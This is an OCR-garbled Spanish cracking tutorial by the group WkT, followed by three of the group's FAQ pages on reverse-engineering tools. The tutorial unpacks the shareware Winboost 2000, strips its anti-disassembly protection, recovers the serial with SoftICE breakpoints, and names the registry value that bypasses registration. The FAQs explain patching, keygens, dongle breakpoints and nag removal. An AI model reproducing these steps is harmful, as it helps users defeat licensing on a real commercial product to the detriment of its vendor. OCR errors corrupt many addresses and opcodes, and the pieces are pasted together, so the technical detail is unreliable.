NUNCA al programar algo que pretendemos vender: Dejar las puertas 
abiertas. 


Primer susto 


Al abrir el programa nos aparece una ventana con el tipico mensaje: "This is an 
unlicensed copy.....etc", un botoncito con una cuenta atras y la leche. Que peligro. 
Ummm, hay una opción para introducir un Serial. Veamos si es más de lo mismo. 
:0( 

Ponemos un nombre y un fake serial, le damos al botoncito..... y NADA, no hay 
mensaje de error. Tsche!! ¿de que vas bitter-kas? , esto ya es algo mas interesante. 
(No te creas todo lo que te dice la gente, ya veras) 


Bueno, seguimos a ver por donde podemos atacar. Lo primero es lo primero: 
Desensamblamos el archivo WB2000.exe usando el W32dasm con la intención de 


echar un primer vistazo. aaaaaaaaahhhhhhhhh!!!! ¡Que miedo! No vemos nadaaaa 
mi 


uy uy, esto tiene muy mala pinta. Probamos esa dll sospechosa a ver.....(wb2000.dll) 
.... tsche!! nada!! tampoco hay nada visible. 


E. 
Vi 


Abrelatas! 


Esta joya tiene toda la pinta de estar comprimida. Como no tenemos ni idea de que compresor han 
utilizado para hacer un poco de magia, vamos a echar mano de un útil programita. Se trata del Gettyp. 
Este programa, disponible en http://w3.to/protools/ nos proporcionara toda la información necesaria 
para descomprimir correctamente el archivo. Vaya, parece ser que se trata del "ASPACK 1.083" 


¿GetTyp User Interface 1.06 - D:icrackingigettypforwm1... 


Filename: [F Awinboost2000_1.0.144B2000.exe 


- [F:1WINBOOST2000_1.0.111WB2000.exe] ----- 
DOS executable file - 681984 bytes 


Portable executable (starting at 256 for 681722 
Packer: ASpack 1.083 
Calculated entrypoint% 675328  O00A4E00Oh  ( 
Required CPU type: 80386 
Requires any version of MNin3Z 
Flags: 
File is executable 
Line mumbers stripped from file 
Local symbols stripped from file 


About... | ll Dptions... | Close | 


Estupendo, parece que ahora ya podemos echar mano del ProcDump para descomprimir el .exe y 
poder desensamblarlo. A ver si hay suerte hombre. :0) 

Abrimos el Procdump y seleccionamos Unpack, seleccionamos el compresor aspack 1.083 y le 
indicamos la ruta hasta nuestro WB2000.exe. Una vez cargado el Winboost, volvemos a la ventana del 
Procdump y si todo ha salido bien veremos una ventanita como esta: 


há 


ProcDump Request 


AN Please hit OK when task is loaded [check TaskBar] 


Pulsamos el boton y esperamos, esperamos..... esperamos....ahh, por fin nos sale una opcion para 
guardar el archivo descomprimido. Umm vamos a llamarlo WB2000ecd.exe mismamente. :0) Process 
succesfully unpacked!!! Estupendo. Vamos a probar ese WB2000ecd.exe a ver si funciona bien. Como 
la seda, pero sigue estando "unregistered” :0) jejeje. 


Ok, desensamblamos la octava maravilla y vamos a ver esas "String References”. Aaaaaaaaarggg2822 
!!! pero que pasa aqui??? 


Calma calamar. :0) 
Lo que sucede es que el programa tiene una protección anti Dasm que te acaba de acojonar. Newbie, 
tranquilo, toma un poco de aire y al ataque: 


Bien, despues de este estúpido inciso..... ¿cómo quitamos esa protección?. 
(Ya vas cargando otra vez el ProcDump) 


Pulsamos el boton Pe Editor y abrimos WB2000ecd.exe. Más botoncitos, pulsamos "Sections". Vaya 
una ventanita, para variar. :0) Pulsamos sobre "CODE" y le damos al boton derecho del raton. Nos sale 
un menu y seleccionamos "Edit section". Abajo, donde pone "Section Characteristics" vamos a 
modificar el valor CODOO040 por E0000020 , Pulsamos "ok", otra vez, otra vez y finalmente "EXIT". 
Desensamblamos.......... ¡1¡¡ BINGO!!! 


Ahora empieza lo interesante :0) 

Veamos, ¿por donde atacar? ¿recuerdas que no nos ha salido ningun mensaje de error al introducir 
nuestro fake serial?. Tsche!! "String References", ciertamente has acertado. Veamos si hay algo 
interesante que nos aproxime a nuestro ansiado Serial. 


Umm, encontramos una referencia a "Winboost 2000 has been registered succesfully" en :004C3325 


Si miramos un par de páginas hacia arriba nos encontraremos un monton de referencias a lo que 
parecen ser numeros de serie. ¿? Al llegar al final de los numeros vemos: 


* Referenced by a (U)nconditional or (Cjonditional Jump at Address: 


|1:004C35C8 (0) 

| 

:004C3185 8B45F4 mov eax, dword ptr [ebp-0C] 
:004C3188 SB55FO mov edx, dword ptr [ebp-10] 
:004C318B ES900CF4FF call 00403E20 

:004C3196 8B45FO mov eax, dword r [ebp-10] 
:004C3199 BA30364Cc00 mov edx, 004C3630 

:004C319E ES?DOCF4FF call 00403E20 

:D004C3143 0FS840c010000 je 004C32B5 

:004C3149 S8B45FO mov eax, dword ptr [ebp-10] 


* Possible StringData Ref from Code 0bj ->"417478292" 


He puesto el cursor en el salto que nos evita llegar a todos esos numeros de serie. Fijate en esa call 
justo anterior. 

:004C318B CALL 00403E20 La seguimos a ver donde nos lleva. Tiene toda la pinta de ser la que 
comprueba nuestro serial. 


:00403E20 53 push ebx 
:00403E21 56 push esi 
:00403E22 57 push edi 
:D00403E23 82906 mov esi, eax 
:D00403E25 82D? mov edi, edx 


:00403E29 0FS48FO000000 je O0403EBE Ñ 


Efectivamente, Si cargamos el Softlce Podremos observar que en :00403E27 CMP EAX, EDX se 
compara nuestro fake serial (guardado en EAX) con el verdadero numero de serie (en EDX), con solo 
escribir "d edx" en el softice veremos nuestro ansiado Serial. 

Ahora te preguntaras..... ¿como hago para que el Softlce se pare justo ahi? Si no me sale mensaje de 
error ni nada!!! Pues muy sencillo. 


Pero esto no era Shareware? 


Cargamos el winboost con el softice. Escribimos nuestro nombre y fake serial (no pulses el boton 
todavia). Pulsamos control+d y ponemos un breakpoint en hmemcpy Tal que asi: "BPX HMEMCPY" 
volvemos al winboost y ahora si que pulsamos el boton. Boom!! aterrizamos en el softice, pulsamos 
FS, F11 Y vamos pulsando F12 varias veces hasta llegar al codigo del winboost. Una vez en el, 
ponemos el "BPX 00403E20" . Cerramos el winboost, volvemos a cargarlo y choff, aterrizamos en el 
Softlce, justo antes de entrar en la call. Pulsamos F8 para entrar e ir traceando hasta llegar a la CMP 
EAX, EDX. 

Y el resto ya lo sabes. ¿no? :0) Estas hecho un fiera!! ;0) 


Estupendo, borramos todos los breakpoints con "BC *" salimos del softice y metemos el nuevo serial. 
Heeeeeey!! estupendo, era ese. (Pues claro, que te creias? jeje). Salimos del winboost y esta vez lo 
abrimos pero con el exe original , con el comprimido. Mec, ventanita de REGISTRADO. :0). Si 
monitoreas un segundito con el "Regmonitor” podras observar la ABSOLUTA ESTUPIDEZ DE 
ESTA PROTECCION. Si, lamentable, realmente lamentable. Nos hemos tirado un buen rato 
analizando este programa ¿para estoooo?? 


NOTA Para la gente de www.magellas.com: 


Tanta compresión y protección anti desensamblador para estoooo?? 
Señores, seamos serios. 
Se han dejado ustedes la puerta de atras completamente abierta!!!! 


Registro de Windows --STOP-- Imbecilidad Absoluta --STOP-- Para protegerlo asi mejor regalarlo -- 
STOP-- Aprendan Ingenieria Inversa y algo más --STOP-- 


[HKEY_LOCAL MACHINEANSoftwarelMagellassMWinBoost 2000] 
"Registered"="True" 


Siiiiii !!!! Acojonante!!! 

Todo el mecanismo de registro depende de si el programa encuentra esa 
clave en el registro. 

"Registered"="True" <---- Ni siquiera comprueba su valor, solamente 
que exista !!!!! 


Creo que no hace falta que te recuerde el propósito de estos 
tutoriales. ¿no? 


NOTA: Estos tutoriales pueden contener errores intencionados (puede 
ser que el autor se haya saltado la explicación de algún paso, 
errores en las direcciones de memoria...... etc). 

El objetivo es que aprendas a crackear y que tengas ideas propias. 
70) 


ii ======= A PERSONAL GREETZ *-+-*-*-=o====== Erri 
Dasavant, Niabi, r00ster, ZEncrakz, Azrael, Klimpong, Zor 

Conde-Vampiro, Mac-Crack, Killer_P, ASTAGA, Harvestr, Iczelion 

JosephCo, Carpathia, Taylor, Tapu, Ivanopulo, EgoistE, Tornftdo, 


JUANDA, Leoworld, ReKiem, Neural_N, Netking, Russ97, 
Mr.Pink and of course all WKT Members ¡;o) 


* * 


|WHISKEY KON TEKILA| 
|Mr.WhiTe [WkT!99] | 
|http://wkt.tsx.org| 
|http://ecd.tsx.org| 


* * 
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FAQ 1 WKT Tutorialz Site | FAQ 2 


Introducción 


Estas leyendo la FAQ Oficial de [Wk'T'!]. Este proyecto fue iniciado en su momento 
(1997) por Mr.Red [WkT!], y ahora volvemos a reabrirlo para deleite de todos 
nuestros lectores. La versión inglesa aún no esta disponible, y es posible que nunca 
llegue a ver la luz. A no ser que algún alma caritativa se ofrezca voluntaria a iniciar 
la traducción. Algún voluntario??? 

Si es así, por favor envianos un e-mail. 


Si tus dudas aún no están resueltas en esta FAQ, [WkT!] te recomienda que te pases 
por la Web de Gerza, donde encontrarás la FAQ Oficial del "Spanish 


ReverseEngineering Forum". 


Si alli tampoco encuentras lo que buscas, utiliza ese foro. 


¿Cual es el objetivo de [WkT!]? ¿Por que un grupo de crackers hispano? 
¿Qué es el Cracking? 

¿Qué es un debugger? 

¿Qué es un desensamblador? 

¿Qué es un editor hexadecimal? 

¿Todos los programas se desprotegen de la misma forma? 


¿Qué diferencias hay entre programas hechos en Visual C++ y Visual Basic? 
¿Cómo saber si un programa esta hecho en Visual Basic? 
¿Qué es una DLL? 


Pongo un break point en Winice y nunca para el programa en él 
Cuando paro un programa con Ctrl+D en Winice me aparece el listado en una zona llamada KERNEL32 


¿Cual es el objetivo de [WkT!]? ¿Por que un grupo de crackers hispano? 


Desde sus orígenes, el objetivo de Whiskey Kon Tekila ha sido, es y será siempre proporcionar información. Por 

iversos motivos (principalmente económicos) la Ingeniería Inversa siempre se ha considerado un tema "tabú" en 
d t (p palment ) la Ing I p h derad t "tabú" 
la Informática. Y como tal, el desconocimiento técnico en este sentido ha sido notable. 


(Al menos en el mundo hispano hablante). 


[WkT!] surge como un grupo de gente apasionada por la programación de protecciones hardware/software, con 
el único propósito de ampliar su conocimiento y el de cualquier otra persona interesada al respecto. Los 
programadores de aplicaciones comerciales suelen actuar con una cierta indiferencia cuando se trata de 
programar la protección de su software. Quizá sería más correcto afirmar que más que indiferencia se trata de 
inconsciencia. Desconocimiento, en definitiva, de las técnicas empleadas desde "el otro lado". 


Es por esto que estas páginas constituyen (o eso se pretende) un punto de referencia para todo aquel programador 
realmente interesado en ampliar sus conocimientos y adaptarlos a los nuevos tiempos. 

[WkT!] es consciente de que la información proporcionada en su Web Site puede llegar a ser un "arma de doble 
filo", puesto que nada impide el posible mal uso de esa información por parte de nuestros lectores. Ante esto 
cabría plantearse unas cuantas cuestiones: 


e ¿Hasta donde llega el conocimiento sobre Ingenieria Inversa del programador hispano? 
Cuando un programador desarrolla una protección.... ¿es consciente de sus limitaciones? 
¿Sabe cómo buscar sus puntos débiles? ¿Quiere realmente ELIMINAR esos puntos débiles? 

e El problema de la piratería de software .... ¿Es acaso una consecuencia de la sociedad consumista actual? 
¿0 se debe en mayor medida a los elevados precios del mismo? 

e ¿Por qué algunos de los mejores y tambien más caros programas son al mismo tiempo los que peores 
protecciones incorporan? ¿Hasta que punto preocupa la protección de su software a las grandes 
compañias? 

e Cuando alguien utiliza un crack... ¿Es porque quiere evaluarlo mejor antes de comprarlo? 

¿Lo hace porque no puede pagar el programa en cuestión? 
¿Lo hace porque no quiere pagarlo? Si es así.... ¿es consciente del daño que puede ocasionar? 

e Realmente, ¿Que deberia estar más sujeto a una "persecución social”? 

¿El uso ilegal de un programa o la programación / administración inadecuada e insegura del Software? 


Quizá estas sean algunas de las cuestiones más polémicas, pero que en definitiva nos hacen reflexionar a todos si 
el estudio de la Ingenieria Inversa deberia dejar de ser considerado como algo dañino e inapropiado para ser más 
tenido en cuenta a la hora de programar una aplicación comercial. Y es que, en definitiva, el mejor modo de 
avanzar en el conocimiento es investigar y para ello el primer paso es conocer nuestro propio software. Espero 
que esto te haya aclarado un poco la situación. De todas formas, gracias por haberlo leido. 

Un saludo. Mr.WhiTe [WkT!] 


|¿Qué es el Cracking? 


No tiene nada que ver con las drogras...(el famoso Crack) : ( 


"Crackear es el arte de reventar protecciones software/hardware con fines intelectuales, personales pero no 
lucrativos. Crackear también se llama "ingeniería inversa" (Reverse Engineering), ya que sin el programa fuente 
se es capaz de analizar el comportamiento del programa y modificarlo para tus intereses." 

Ref.- Como crackear por Estado Porcino. 


¿Qué es un debugger? 


Permite ver paso a paso (instrucción a instrucción) un programa mientras se está ejecutando en la memoria del 
ordenador. 

Las instrucciones se visualizan en ensamblador normalmente. Nos servira para ver como se comportan las rutinas 
de protección ya que son parte del programa. En el podremos cambiar instrucciones para comprobar y asi eludir 
las protecciones. Estos cambios no son permanentes en el fichero ejecutable. 


El mejor debugger es Softlce (Softice para Windows 95) http://www.numega.com 


Para MSDOS existe una versión Softice y otras versiones poco potentes llamadas DEBUG y SymDebug. 


|¿Qué es un desensamblador? 


Un desensamblador toma un fichero de instrucciones en hexa y lo convierte a lenguaje ensamblador. El lenguaje 
ensamblador, es el conjunto de sentencias que entiende el microprocesador 

(tu Pentium o mi 486). El procesador es el corazón del ordenador, todas las sentencias son ejecutadas por él y 
sólo por él. 

Por ejemplo un 43 en hexa se transforma en inc eax. Se necesitan algunos conocimientos de ensamblador pa esto 
de crackear. 

Nosotros usaremos el desensamblador para crakear con la técnica de la lista muerta... 

Ref.- Como crackear por Estado Porcino. 


|¿Qué es un editor hexadecimal? 


"Los programas no son más que un conjunto de instrucciones y cada instrucción no es más que un conjunto de 
bits, pero donde demonios se guardan esos bits?. Los bits del programa se localizan en los ficheros, p.e. las 
instrucciones del programa de compresión ar] se guardan en el fichero arj.exe. Hay algunos programas que no 
guardan todas sus instrucciones en único fichero, si no en varios, un ejemplo de esto son los programas que 
utilizan librerías dinámicas (o dll)." 


Un editor hexadecimal, no es más que un programa, que permite "editar" los ficheros de instrucciones de otros 
programas, osea, que permite ver,modificar,copiar,pegar... los bits de los programas. Para simplificar la cosa no 
se muestran los bits a pelo, sino que se muestran en hexadecimal, de ahí su nombre. 


Nosotros lo utilizaremos para alterar el comportamiento de los programas. Supongamos que conocemos la 
instrucción sentencia de la rutina de protección que debemos modificar, sea jz 23 y queremos modificarla por jnz 
23, bien como toda instrucción no es más que un conjunto de bits, sea 0110 para jz 23 y 1001 para jnz 23, sólo 
nos queda buscar estos bits dentro del fichero ejecutable del programa (que es, en general, el contiene las 
sentencias del programa). Como usamos un editor hexadecimal, debemos buscar la secuencia de un unos y ceros 
en hexa en el fichero del programa que queremos modificar. Si la secuencia que buscamos es muy común 
deberemos utilizar las instrucciones que se encuentran entorno a la instrucción a modificar. 


Esto es muy importante, sólo debe existir una localización del patrón de búsqueda en el fichero, si existe más de 
una, debemos añadir a la búsqueda las sentencias de alrededor, sino se corre el riego de modificar la sentencia 
equivocada, lo que provoca casi siempre un "cuelgue". 

Ref.- Como crackear por Estado Porcino. 


Uno de los más completos es UltraEdit-32 Professional http://www .uedit.com 


|¿Todos los programas se desprotegen de la misma forma? 


No... 
Un programa aún haciendo lo mismo puede programarse de mil formas... Esto se entiende en las protecciones del 
mismo modo (protecciones de numero de serie, etc..). 


Pueden existir miles de formas de proteger un programa, aún siendo el mismo tipo de protección. 
No obstante la "estupidez" de muchos programadores de pacotilla (aquellos que solo ven dinero en sus 
programas), y a la falta de imaginación de otros, hacen que la tarea de desproteger sea a veces muy sencilla. 


¿Qué diferencias hay entre programas hechos en Visual C++ y Visual Basic? 


La mayoría de las aplicaciones programadas mas profesionalmente para Windows 93 (requieren un conocimiento 
mas exhaustivo de programación) son las compiladas en C++... aparte de ser siempre las mas rápidas. 
De hecho Windows 953 está hecho prácticamente en C++... 


La diferencia entre Visual C++ y Visual Basic es la siguiente: 


Con Visual C++ somos como el director general de una oficina mientras que con Visual Basic somos los 
empleados (si entregamos un informe pasaremos por varios departamentos hasta que llegue al despacho del 
director general). 

E incluso no podremos hacer cosas que no pueda hacer el director general. Todo ese proceso interno de pasar de 
un departamento a otro lo realizan unas librerías que actúan mientras se ejecuta el programa (librerías Run-time). 
Estas son VBRUN300, VB40032, MSVBMS5O0 según sea la versión de Visual Basic. 


Desde el punto de vista de un cracker es mucho mas interesante un programa en C++... 

Los crackers suelen huir de programas hechos en Visual Basic, por lo incomodos y pesados que son y porque 
casi nunca aportan nada interesante que investigar. Aunque esto no significa que sean los mas dificiles de 
desproteger. 


¿Cómo saber si un programa esta hecho en Visual Basic? 


Existen muchas maneras, pero todas consisten en lo mismo. Hay que localizar referencias a varias librerias de 
ejecucion. Sus nombres son VBRUNxxx (xxx =100,200,300 para la versión 1,2 y 3 respectivamente), 
VB40032.DLL para la versión 4 del compilador de Visual Basic y MSVBM50.DLL para la versión 5. Las 
formas de localizarlas podrían ser: 


e Usar un editor hexadecimal con el fichero EXE a tratar y usar la opción de busqueda.... Ejemplos de 
texto a buscar: VBRUN300, VB40032, MSVBMS50 

e Usar un desensamblador (W32Dasm) con el archivo EXE y una vez desensamblado mirar al principio 
del listado en la zona de : 


PARA A A A A A 4444 IMPORTED FUNCTIONS 444444 A A A A A A A A A A + 
Number of Imported Modules = 1 (decimal) 


Import Module 001: MSVBVM50.DLL 


Aquí se observa una referencia a la libreria de ejecución de Visual Basic 5.0, con lo que este ejecutable está 
compilado con VBasic. 


|¿Qué es una DLL? 


Es una librería dinámica (Dynamic Link Library). Es un fichero en el que residen funciones(código ejecutable) o 
recursos (ventanas de un programa, menues, iconos, bitmaps, etc...) y que pueden ser llamadas por cualquier otro 
programa de Windows. Existen una gran variedad de DLL personalizadas y comerciales que permiten sacar 
partido a muchos programadores (Jscript.dll =librería de Java Script, TI32v20.d11 =Timelock, rutina de 
protección de programas en periodo de prueba, etc...). 

De hecho Windows 95 usa en su mayoria DLLs... KERNEL32.DLL, USER32.DLL, GDI32.DLL... 

Incluso los archivos DRV y FON (fuentes) son DLL, aunque estos se cargan de forma no automatica... 


¡Pongo un break point en Winice y nunca para el programa en él 


Hay muchas instrucciones de programas que nunca se ejecutan si no se dan las condiciones adecuadas... 
Siempre conviene estudiar un poco el ejecutable, o bien con la lista muerta o con el Winice. 
Poner en cualquier punto del programa un breakpoint no lleva a nada si no sabemos donde lo ponemos. 


¡Cuando paro un programa con Ctrl+D en Winice me aparece el listado en una zona llamada KERNEL32 


Esto es muy normal, teniendo en cuenta que Windows 93 usa internamente un API 
(Interfaz de Programación Avanzada) núcleo de sistema (Kernel) de 32 bits. 
El kernel32 es el minimo de código que necesita Windows93 para arrancar el sistema. 


También la mayoria de los programas suelen usar esta API para realizar operaciones basicas con sus funciones( 
uso de archivos, tareas, recursos, carga de librerías, uso de la memoria, etc..). Hay unas 780 funciones dentro de 
esta librería. 

Muchas rutinas de protección hacen uso de funciones de esa librería y de otra llamada USER32.DLL. 


Para nosotros el listado interno de estas librerias no interesa. Usaremos estas funciones como cajas tontas (solo 
interesará lo que nos muestre por fuera no como esté hecha por dentro). Es decir, si un programa usa la función 
GetComputerName (obtener el nombre de la computadora), solo nos interesará el nombre que la computadora, 
no como lo obtiene internamente. 
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Introducción 


Estas leyendo la FAQ Oficial de [Wk'T'!]. Este proyecto fue iniciado en su momento 
(1997) por Mr.Red [WkT!], y ahora volvemos a reabrirlo para deleite de todos 
nuestros lectores. La versión inglesa aún no esta disponible, y es posible que nunca 
llegue a ver la luz. A no ser que algún alma caritativa se ofrezca voluntaria a iniciar 
la traducción. Algún voluntario??? 

Si es así, por favor envianos un e-mail. 


Si tus dudas aún no están resueltas en esta FAQ, [WkT!] te recomienda que te pases 
por la Web de Gerza, donde encontrarás la FAQ Oficial del "Spanish 


ReverseEngineering Forum". 


Si alli tampoco encuentras lo que buscas, utiliza ese foro. 


Vi 


¿Por qué todos los crackers están contra Microsoft? 

¿Dónde puedo encontrar más información sobre "ingeniería inversa" 
(Reverse Engineering)? 

¿No me funciona un crack? 

¿Qué es un generador de claves (key generator)? 

¿Qué es Softice y Winice? 

¿Cómo puedo configurar el Softice o Winice para usarlo en nuestros asuntos? 
¿Qué es el ensamblador? 

¿Qué es un parche? 

¿Como se desprotegen las pastillas o mochilas (protección hardware)? 
¿Cómo se que es lo que tengo que cambiar para desproteger? 


|¿Por qué todos los crackers están contra Microsoft? 


Microsoft pretende imponer sus normas a todo el mundo. Aparte de crear un sistema operativo lleno de errores e 
inestable por todos los lados, hacen uso de estrategias de todo tipo para imponerse a todo el mundo sin importar 
como. 


Esto no significa que otra compañia sea la buena de la película... Limitan la capacidad de los usuarios a elegir su 
sistema operativo, navegador, etc... 


¿Dónde puedo encontrar más información sobre "ingeniería inversa” (Reverse Engineering)? 


El mejor sitio donde encontrar esa información es http://surf.to/fravia 


Recomendamos el uso del navegador Netscape ya que muchas páginas son Anti-Microsoft 
(Internet Explorer) Es un lugar que no hay que dudar en visitarlo... 


¿No me funciona un crack? 


¿Has probado a copiar el crack en el mismo directorio del ejecutable del programa a desproteger? 
¿Tienes una versión distinta? 
¿Te has leido el wkt.nfo que acompaña a todos nuestros cracks? 
Si la respuesta a las preguntas de arriba es Si y no va el crack... 
Pues que quieres que te diga... 

Buscate la vida... o aprende a crackear por ti mismo. 


Y recuerda, los cracks producidos por [WkK'T'!] tienen como única finalidad permitir una mejor evaluación del 
programa al que van destinados, así como enseñar las limitaciones de las protecciones empleadas. 

En ningún caso los cracks deben ser utilizados para evitar el pago del correspondiente programa. 

Si crees que un programador ha realizado una buena aplicación, que te es útil, que la usas y además está bien 
programada, entonces obra adecuadamente y recompénsalo registrándote. 

Nosotros no nos hacemos responsables de lo que tú hagas con nuestros cracks. 


|¿Qué es un generador de claves (key generator)? 


Es un programa que esta basado en un algoritmo de protección. 
El llegar a conocer este algoritmo, requiere un estudio avanzado de un programa. 
Permiten obtener el número de serie de un programa. 

Es una forma elegante de desprotección. 

A veces son muy complejos y otras veces son muy sencillos y simples. 


|¿Qué es Softice y Winice? 


Es el nombre de uno de los depuradores de código mas potentes que existen. El nombre se usa indistintamente 
para este depurador (debugger). Hay versiones para DOS y para Windows (Winice). El nombre mas usado es el 
de Softice tanto para DOS como para Windows. 


¿Cómo puedo configurar el Softice o Winice para usarlo en nuestros asuntos? 


Una manera de configurar Softice sería editar el archivo winice.dat (dentro del directorio de instalación del 
Softice). 

Cambiar las lineas siguientes: 

INIT=X;wl;wr;wd7;code on; 

HST=512 

A toda línea del tipo EXP=cWwindowsisystemisystem.drv , quítale el punto y como inicial. 

Siempre que un programa use una DIl especial, puedes añadirla en este archivo. 


Ref.- Como crackear por Estado Porcino. 


|¿Qué es el ensamblador? 


Es un tipo de lenguaje de programación (ensamblador, C++, Pascal, Cobol, Basic...). Es un lenguaje de bajo 
nivel. Esta formado por nemotécnicos de ingles (JMP ->proviene de JUMP, NOP ->No OPeration, MOV - 
>Move, etc..). 

Es de los lenguajes mas próximos a la CPU... 

Cada instrucción esta formada por una serie de bytes que hacen actuar a la CPU. 

Ejemplos de instrucciones: 


Byte(s) hexadecimal Instrucción ensamblador 
66 F7 C6 01 00 TEST S1,0001 
C3 RET 
90 NOP 
F3 A5 REPZ MOVSD 
Fc CLD 


Introducciendo en la CPU esta ristra de bytes (66 F7 C6 01 00 C3 90 F3 AS FC) se ejecutarán esas instrucciones. 
Por supuesto la CPU sabe separar instrucciones aparte de otras cosas... 


Este lenguaje posee mas de 100 instrucciones... y aprender este lenguaje nos ayudará a comprender los 
programas que queramos desproteger... 


|¿Qué es un parche? 


Es un cambio que se realizará en un programa para hacer que este se comporte como deseemos para siempre... 
Los cambios se realizan a nivel de bytes... ya que las instrucciones en ensamblador o cualquier dato siempre 
estarán formadas por bytes. 


¿Como se desprotegen las pastillas o mochilas (protección hardware)? 


Poniendo breakpoints en los puertos de impresora. bpio -h xxx -->>xxx=dirección de puerto de impresora 

bpio -h 378 

Existen varios tipos de protección... 

Hay pastillas que tienen parte del programa encriptado en su interior, con lo que es practicamente imposible de 
desproteger si no se tiene la pastilla. 

Hay otras pastillas que solo se usan como comprobación, con lo que la protección suele ser una chapuza y a 
veces es incluso mas facil que protecciones de numero de serie... 

(Nota a los programadores: es una tonteria que useis protecciones del segundo tipo, ahorraros el dinero o usar las 
del primer tipo... Aunque mejor seria bajar los precios al no tener que usar pastilla) 


¿Cómo se que es lo que tengo que cambiar para desproteger? 


Depende de la cantidad de bytes que tengamos que cambiar. 
O se tiene información de la codificación de instrucciones en ensamblador (paso de instrucción a bytes) o lo 
mejor es usar el Softice con el comando A cs:Xxxxxxxx (donde xxxxxxxx es la dirección donde está la 
instrucción a cambiar). 

Tecleamos la instrucción a cambiar y asi podremos obtener los bytes nuevos. 


ejemplo: 

13F :0000109B 74 07 JZ 10A4 <---instrucción a cambiar por JMP 10A4 
-A 13F:109B 

13F:109B_ JMP 10A4 

13F :0000109B EB 07 JMP 10A4 <---instrucción cambiada 


Normalmente se tienen pocos bytes para cambiar y conviene usar algunos trucos... 
Por ejemplo.- Asignar el registro EAX a 1 con la instrucción: 
(B8 01 00 00 00) MOV EAX,1 <----- (ocupa 5 bytes) 
ocupará mas bytes que usar las instrucciones 


(33 CO) XOR EAX, EAX <------ (ocupa 2 bytes, pone a cero EAX) 
(40) INCEAX <------ (ocupa 2 bytes, incrementa EAX). 
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FAQ 2 WKT Tutorialz Site FAQ 4 


Introducción 


Estas leyendo la FAQ Oficial de [WkT!]. Este proyecto fue iniciado en su momento 
(1997) por Mr.Red [WkT!], y ahora volvemos a reabrirlo para deleite de todos nuestros 
lectores. La versión inglesa aún no esta disponible, y es posible que nunca llegue a ver la 
luz. A no ser que algún alma caritativa se ofrezca voluntaria a iniciar la traducción. 
Algún voluntario???? 

Si es así, por favor envianos un e-mail. 


Si tus dudas aún no están resueltas en esta FAQ, [WkT!] te recomienda que te pases por 
la Web de Gerza, donde encontrarás la FAQ Oficial del "Spanish ReverseEngineering 


Forum". 
Si alli tampoco encuentras lo que buscas, utiliza ese foro. 


» 
Ven 


¿Qué es el Procdump? 

¿Cómo puedo saber si un programa está comprimido? 

¿Qué es la función Hmemcpy? 

¿Por qué a veces no puedo ver las "string references" cuando utilizo el W32Dasm? 
¿Qué significa "Crippleware"? 


¿Cómo puedo saber si un programa accede al registro del Windows? 
¿Cómo puedo saber si un programa accede a algún archivo? 

¿Cómo se puede "cazar" un serial en un programa escrito en Visual Basic? 
¿Qué es eso del "Color Crack" o "crack en colores"? 

¿Qué es una Nag Screen? ¿Cómo se puede eliminar? 


¿Qué es el Procdump? 


ProcDump es una herramienta que te permite (entre otras cosas) copiar el contenido de un proceso al disco duro. 
También te permite editar la cabecera de los programas de tipo PE (Portable Executable). 


¿Cómo puedo saber si un programa está comprimido? 


La mejor forma de averiguar si un programa está comprimido es utilizar alguna herramienta como el Gettyp. 
Es conveniente tenerlo siempre a mano, al igual que el Procdump (para descomprimir el programa en cuestión). 
Utilizando el Gettyp sabremos el tipo de compresor utilizado (Aspack, petite, upx....etc). 


¿Qué es la función Hmemcpy? 


HMEMCPY es una API de Windows, que utiliza la memoria RAM para leer, manipular, comparar y almacenar 
cadenas (texto que introducimos cuando un programa nos pide el numero de serie por ejemplo). La funcion recoge la 
informacion que le proporcionamos y la carga en memoria. Despues manipula esas cadenas, las mueve y las compara 
(por ejemplo compara tu numero de serie con el correcto), y despues decide si la cadena es o no la correcta. 

La funcion HMEMCPY devuelve esta informacion al programa en cuestion, y si has puesto el serial correcto te lo 
aceptara o de lo contrario te mostrara una bonita ventana de error. 

HMEMCPY se puede utilizar para "cazar" numeros de serie validos en programas shareware. Utilizando un debugger 
(depurador) como el Softlce, podemos poner un breakpoint en HMEMCPY para que el programa se pare y nos avise 
cuando llama a la funcion. Muchos programas shareware utilizan esta función para comparar numeros de serie, sobre 
todo cuando han sido escritos en Delphi o en Visual Basic. 


¿Por qué a veces no puedo ver las ''string references'' cuando utilizo el W32Dasm? 


Pues depende. En ocasiones se debe a que el programa tiene algún tipo de protección anti-desensamblado. 

Un ejemplo: En el caso del programa Winboost 2000 (Protección analizada por Mr.WhiTe, véase http://ecd.tsx.org) 
Sucede que al editar el *.exe (previamente descomprimido con el ProcDump) y seleccionar "Edit section". Abajo, 
donde pone "Section Characteristics" si modificamos el valor CODOO0040 por E0000020 y guardamos los cambios, la 
protección habrá desaparecido mágicamente. 


¿Qué significa "Crippleware''? 


Cuando un programa incorpora alguna de sus opciones deshabilitada (como por ejemplo guardar un archivo) 
existen dos posibilidades: 


e El código que hace funcionar esa función está presente en el programa pero no esta activada. 
e El código no esta presente en el programa. Entonces se dice que el programa es "Crippleware". 


Es posiblemente la mejor opción a la hora de proteger un programa. 
Es muchisimo más dificil que un Cracker consiga habilitar esa función (pero no imposible). 


¿Cómo puedo saber si un programa accede al registro del Windows? 
"Utilizando una herramienta llamada REGMON (Registry Monito 
¿Cómo puedo saber si un programa accede a algún archivo 
"Utilizando una herramienta llamada FILEMON (File Mori 
¿Cómo se puede "cazar" un serial en un programa escrito en Visual Basie? 


El Visual Basic no es precisamente el lenguaje más apropiado para programar una aplicación comercial. En el caso de 
toparnos con una de estas "joyas", una opción muy aconsejable es echar mano del Smartcheck de la empresa Numega 


¿Qué es eso del ''Color Crack' o "crack en colores''? 


Se trata de una "nueva" técnica de cracking empleada por Estado+Porcino. 
Es bastante útil cuando el mensaje de "error" no es una ventana sino una cadena dentro de una ventana. 
Debemos averiguar el color que se aplica al mensaje y colocar en el Softlce: 

bpx nombreRutina if (*(esp+8)==00BBGGRR) 

Recordad que los valores de Blue(azul), Green (Verde), Red (rojo) están en hexadecimal. 

Para más información véase el tutorial sobre el Multimedia Builder en http://ecd.tsx.org. 


¿Qué es una Nag Screen? ¿Cómo se puede eliminar? 


Una Nag Screen es una ventana que nos molesta durante la ejecución de un programa. Los motivos pueden ser muchos 
(Aparece al arrancar el programa recordandonos que no estamos registrados, nos informa de algo y nos obliga a esperar 
a que desaparezca, nos obliga a pulsar un botón para mandarla a paseo......etc) 

No existe ningún método estandar para crackear las Nags. Depende del programa y de la función utilizada para pintar la 
ventana. No es lo mismo el típico MessageBox con el botón de aceptar que otro con varios botones. Tambien hay que 
